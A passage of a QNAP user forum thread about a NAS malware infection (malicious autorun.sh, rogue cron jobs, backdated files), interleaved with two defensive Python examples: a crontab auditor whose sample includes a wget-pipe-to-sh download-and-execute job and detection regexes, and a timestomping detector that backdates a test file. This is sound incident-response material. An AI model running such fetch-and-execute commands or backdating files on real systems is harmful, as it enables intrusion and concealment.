Where are the autorun.sh and crontab files located?

somy1982 wrote:
Thanks, have done that and removed the autorun.sh. Deleted everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs seem to be removed permanently.

Mousetick wrote:
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything; this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late: it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.

Today I went into the .qpkg folder and found many files had been hacked, so I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch.
Does anybody know if QNAP provides a way to completely reset the QTS OS and leave data unchanged?
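An added example (not code from this thread or from QNAP) of how to triage a crontab dump like the one somy1982 cleaned up: it parses `crontab -l` output, compares each command against a baseline of jobs the administrator knows they scheduled, and flags heuristic indicators. The sample crontab, the baseline set and the indicator regexes are all constructed for the demonstration; the indicators are an assumption tuned to the symptoms in this thread, not an authoritative list.

```python
import re

# Constructed sample of `crontab -l` output. The first and last entries are
# ordinary maintenance jobs; the middle two are the shape of entry a cleanup
# after an incident like this one would want surfaced.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/rsync -a /share/Data /share/Backup
*/5 * * * * /tmp/.x/run.sh >/dev/null 2>&1
30 2 * * * /bin/sh -c "wget -q -O - http://example.invalid/p | sh"
0 4 * * 0 /sbin/hd_util --smart-check
"""

# Constructed baseline: the jobs this administrator knows they scheduled.
BASELINE_COMMANDS = {
    "/usr/bin/rsync -a /share/Data /share/Backup",
    "/sbin/hd_util --smart-check",
}

# Heuristic indicators over the command field. Assumption: chosen to match the
# symptoms discussed in this thread (scripts staged in temp or hidden paths,
# download-and-execute); not an authoritative or complete list.
INDICATORS = {
    "runs_from_tmp": re.compile(r"(^|[\s\"'=])/(tmp|dev/shm|var/tmp)/"),
    "fetch_and_pipe": re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "hidden_path": re.compile(r"/\.[^/\s]+/"),
}

# Five whitespace-separated schedule fields followed by the command.
CRON_LINE = re.compile(r"^(?P<sched>(?:\S+\s+){5})(?P<cmd>.+)$")
# VAR=value lines set the cron environment and are not jobs.
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Return [(schedule, command)] for every job line in a crontab dump,
    skipping comments, blank lines and VAR=value environment lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):          # @reboot, @daily, ...: one-token schedule
            sched, _, cmd = line.partition(" ")
        else:
            m = CRON_LINE.match(line)
            if not m:
                continue                  # malformed; not a job line
            sched, cmd = m.group("sched").strip(), m.group("cmd")
        entries.append((sched, cmd.strip()))
    return entries


def audit_crontab(text, baseline=BASELINE_COMMANDS, indicators=INDICATORS):
    """Flag jobs that are not in the baseline or match any indicator.
    Each finding lists every reason, so a reviewer sees why it was raised."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = [name for name, rx in indicators.items() if rx.search(cmd)]
        if cmd not in baseline:
            reasons.append("not_in_baseline")
        if reasons:
            findings.append({"schedule": sched, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f['reasons'])}] {f['schedule']}  {f['command']}")
```

Run it against a copy of the crontab taken from the NAS (`crontab -l > crontab.txt`) so the analysis can happen off-box. A job flagged only as `not_in_baseline` may simply be a legitimate task the baseline does not list yet, so confirm what it does before removing it; the indicator hits are the entries worth looking at first.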
Strange folders and cronjobs
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
- dolbyman
- Guru
- Posts: 34903
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
I've already found crontab, but I didn't imagine mounting a ramblock for the autorun script.
Thank you
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Does anybody know the 10-second reset function? Would that erase all system files?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
A bit OT: How do I reinstall the operating system completely while keeping the data? Would it recognize my disks again? Since this seems to only affect the qnap system, but no data volumes with user data, I would like to only reinstall the operating system.
There is a "restore factory defaults", but this sounds more like resetting a couple of config files and that's it, which would leave malware files around... or does this re-install the operating system?
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Same question, but nobody seems to know. Better to contact QNAP; I have created a case now.

robert_m_muench wrote:
A bit OT: How do I reinstall the operating system completely while keeping the data? Would it recognize my disks again? Since this seems to only affect the qnap system, but no data volumes with user data, I would like to only reinstall the operating system.
There is a "restore factory defaults", but this sounds more like resetting a couple of config files and that's it, which would leave malware files around... or does this re-install the operating system?

BTW, do you have the same symptoms? Did you check when the suspicious files were created?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Yes, same symptoms. My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection). I'm currently transferring my shared folders (where I have my data) to a dedicated volume to free the pool my system is installed on. The idea is to be ready to wipe the pool and system completely. For this I will remove the other pool and take out the disks.
With all this hassle it seems to be wise not to store any data with your system. So: pool-1 = system & apps, pool-2 ff. for data.
I still don't understand exactly how the QNAP system works. There is a firmware that seems to reside on something, as it's possible to get it installed without any disks in the system. And a piece (the Linux system) which gets installed on the 1st volume.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Strange, this must be a known security vulnerability. Given that in all three cases the attacks started on 25/8, I start to wonder if some app or content distributed by QNAP caused this, as otherwise the hacker needs to know the IP of the system to hack in, and that's not normally done on the same date.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Before you go through the hassle, I suggest you create a helpdesk ticket and see what QNAP suggests.

robert_m_muench wrote:
Yes, same symptoms. My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection). I'm currently transferring my shared folders (where I have my data) to a dedicated volume to free the pool my system is installed on. The idea is to be ready to wipe the pool and system completely. For this I will remove the other pool and take out the disks.
With all this hassle it seems to be wise not to store any data with your system. So: pool-1 = system & apps, pool-2 ff. for data.
I still don't understand exactly how the QNAP system works. There is a firmware that seems to reside on something, as it's possible to get it installed without any disks in the system. And a piece (the Linux system) which gets installed on the 1st volume.

I was informed on Thursday that they're working on a new version of Malware Remover which should solve the problem.
I have important documents in an encrypted volume, so I just keep them locked for now and hope there is a shortcut.
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Is there a public reference to your ticket I could jump on?
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
I have a ref number, but it's not public. You can create one from the HelpDesk app or their website.

robert_m_muench wrote:
Is there a public reference to your ticket I could jump on?
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
I think I'm going to install osquery.io and regularly run specific security queries like this set https://github.com/palantir/osquery-con ... otkit.conf
@qnap (if they are listening): IMO such a feature should go directly into the firmware.
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Indeed. The autorun.sh script that I decrypted contains some commands that modify some QNAP configuration and program files, and then change the modification date back in time to make it look like they are not modified.

robert_m_muench wrote:
My problematic files were created 25-Aug too. But I found some infected files with an earlier date. Not sure if this was done by not changing the date of the files (which would be much smarter to avoid detection).

Also, the August 25 date may not necessarily be the date the malware was installed. It could be the date the malware was created/built. This is just speculation; I have no means to verify.
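Backdating a file with utime() only rewrites its access and modification times; the inode change time (ctime) is set by the kernel and still records when the file was last touched, so a file whose mtime lies well before its ctime is a candidate for the kind of manipulation Mousetick describes. The following is an added example, not code from this thread or from QNAP, that walks a directory tree and reports such files. It builds a constructed sample tree (one ordinary file, one backdated a year with os.utime) so it can be exercised offline; the one-hour threshold is an assumption to tune for the directory being scanned.

```python
import os
import sys
import tempfile
import time
from pathlib import Path

# If ctime is more than this many seconds after mtime, the mtime was probably
# set backwards after the content was written. Assumption: one hour is a
# reasonable default; tune it for the directory you are scanning.
BACKDATE_THRESHOLD = 3600


def find_backdated_files(root, threshold=BACKDATE_THRESHOLD):
    """Return [(path, mtime, ctime)] for files under `root` whose
    content-modification time lies more than `threshold` seconds before the
    inode change time. Symlinks are inspected with lstat and not followed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the scan
            if st.st_ctime - st.st_mtime > threshold:
                hits.append((path, st.st_mtime, st.st_ctime))
    return hits


def backdated_names(root, threshold=BACKDATE_THRESHOLD):
    """Sorted basenames of the files flagged under `root`."""
    return sorted(os.path.basename(p) for p, _m, _c in find_backdated_files(root, threshold))


def build_sample_tree():
    """Constructed sample tree for the demonstration: one ordinary file and one
    whose mtime was pushed a year into the past after it was written, which is
    what a timestomping script does. On POSIX filesystems utime() rewrites
    atime/mtime but the kernel sets ctime to *now*, so the gap survives."""
    root = tempfile.mkdtemp(prefix="timestomp_sample_")
    Path(root, "normal.sh").write_text("#!/bin/sh\necho ok\n")
    stomped = Path(root, "stomped.sh")
    stomped.write_text("#!/bin/sh\necho ok\n")
    past = time.time() - 365 * 86400
    os.utime(stomped, (past, past))
    return root


def report(root, threshold=BACKDATE_THRESHOLD):
    """Print one line per flagged file with both timestamps in local time."""
    fmt = "%Y-%m-%d %H:%M:%S"
    for path, mtime, ctime in find_backdated_files(root, threshold):
        print(f"{path}\n  mtime {time.strftime(fmt, time.localtime(mtime))}"
              f"  ctime {time.strftime(fmt, time.localtime(ctime))}")


if __name__ == "__main__":
    # Scan the directory given on the command line, or the constructed sample.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    report(target)
```

Legitimate operations also leave mtime behind ctime: extracting a QPKG or tar archive that preserves timestamps, a chmod or chown, or a rename all bump ctime without touching mtime. Treat hits under .qpkg and the system directories as a worklist to compare against a freshly downloaded copy of the same package version, not as proof of infection on their own.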
-
- Getting the hang of things
- Posts: 93
- Joined: Mon Feb 12, 2018 9:26 pm
Re: Strange folders and cronjobs
Here is a Reddit link about the same topic and how QNAP handles such situations:
https://www.reddit.com/r/qnap/comments/ ... formation/
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Thanks for the link!

robert_m_muench wrote:
Here is a Reddit link about the same topic and how QNAP handles such situations:
https://www.reddit.com/r/qnap/comments/ ... formation/

I'm afraid this one we have now is not something fully recognised by Malware Remover.
The Malware Remover did find some threats on 26/8 when it was first run after the files were created on 25/8, so I believe 25/8 is the time when it started.
However, I checked the files that were recovered (I can see the timestamp they were changed when Malware Remover was scheduled to run on 26/8), but when I check the content of the files I still find the strange encrypted segments, so I deleted the apps and installed them again. This is all I can fix; I don't know how many system files/conf have been compromised, and I have no way to verify that.
Clearly the malware was produced to attack QNAP devices by using some security vulnerability of QTS (or its apps). QNAP owes us an explanation, and they should help us to solve the problem. I suggest everybody who is impacted create a help desk ticket and update here in this thread.